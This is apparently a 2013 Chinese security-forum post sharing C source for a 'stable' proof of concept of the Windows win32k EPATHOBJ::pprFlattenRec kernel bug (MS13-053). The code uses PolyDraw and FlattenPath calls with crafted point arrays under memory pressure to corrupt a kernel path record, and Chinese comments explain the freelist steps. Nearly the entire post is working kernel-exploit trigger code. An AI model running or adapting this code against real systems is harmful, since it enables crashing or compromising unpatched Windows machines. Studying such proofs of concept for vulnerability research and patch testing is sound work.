-
-
[原创]EPATHOBJ 稳定poc
-
发表于:
2013-8-1 23:37
3289
-
具体调试见这里
http://www.binvul.com/redirect.php?tid=333
/*
* windows EPATHOBJ::pprFlattenRec bug poc by boywhp@126.com
* tested in windows 2003 x86
* THX -> http://www.vupen.com/blog/20130723.Advanced_Exploitation_Windows_Kernel_Win32k_EoP_MS13-053.php
*/
#include <stdlib.h>
#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
#include <Shellapi.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#define MAX_POLYPOINTS (64*498) //64 * 4k
POINT Points[MAX_POLYPOINTS];
BYTE PointTypes[MAX_POLYPOINTS];
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
#define PD_RESETSTYLE 0x00000004
#define PD_CLOSEFIGURE 0x00000008
#define PD_BEZIERS 0x00000010
#define ENABLE_SWITCH_DESKTOP 1
typedef struct _POINTFIX
{
ULONG x;
ULONG y;
} POINTFIX, *PPOINTFIX;
int main(int argc, char **argv)
{
HDC expDev, tmpDc = NULL;
ULONG i;
expDev = GetDC(NULL);
for (i = 0; i < MAX_POLYPOINTS; i++) {
Points[i].x = 0x41414141;
Points[i].y = 0x42424242;
PointTypes[i] = PT_BEZIERTO;
}
/* MAX_PT_NUM = e194dfb8 - e194d028 = f90/sizeof(PT) = 1F2 = 498
e194d008 e199d008 e194dfbc 00000fc0 e199d014 e199d008->prev alloc e194dfbc->freestart 00000fc0 total_size
e194d018 00000000 00000011 000001f3 00000000
e194d028 00000000 14141410 24242420 14141410
e194d038 24242420 14141410 24242420 14141410
...
e194dfa8 24242420 14141410 24242420 14141410
e194dfb8 24242420 00000000 00000000 00000000
* 调试:
* 1 使用498*4首先将系统的freelist清0; <-我虚拟机初始就有3个节点
* 2 第二次PolyDraw少几个节点 (必须 > 8),这样就会有几个PT的空间腾出了
* 3 FlattenPath
* 第一次调用EPATHOBJ::newpathrec (*pcMax = e > 8 不会调用win32k!newpathalloc)
直接返回一个指向0x414141 0x42424242内存区域
第二次调用EPATHOBJ::newpathrec->win32k!newpathalloc此时freelist=NULL,调用win32k!PALLOCMEM
此时如果内存分配失败,或者自己在用winbdg改成NULL
此时新创建的newpathrec已插入EPath->ppath->pprfist 但是 newpathrec->next = 0x41414140
4 FlattenPath
内存违规!!!
*/
BeginPath(expDev);
PolyDraw(expDev, Points, PointTypes, 498);
EndPath(expDev);
BeginPath(expDev);
PolyDraw(expDev, Points, PointTypes, 498-15);
EndPath(expDev);
while (tmpDc = CreateCompatibleDC(GetDC(NULL))) {
BeginPath(tmpDc);
if (!PolyDraw(tmpDc, Points, PointTypes, 498*64)){
for (i=63; i>0; i--){
BeginPath(tmpDc);
if (PolyDraw(tmpDc, Points, PointTypes, 498*i)){
printf("start poc %d...\n", i);
FlattenPath(expDev);
FlattenPath(expDev);
}
}
}
}
return 0;
}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
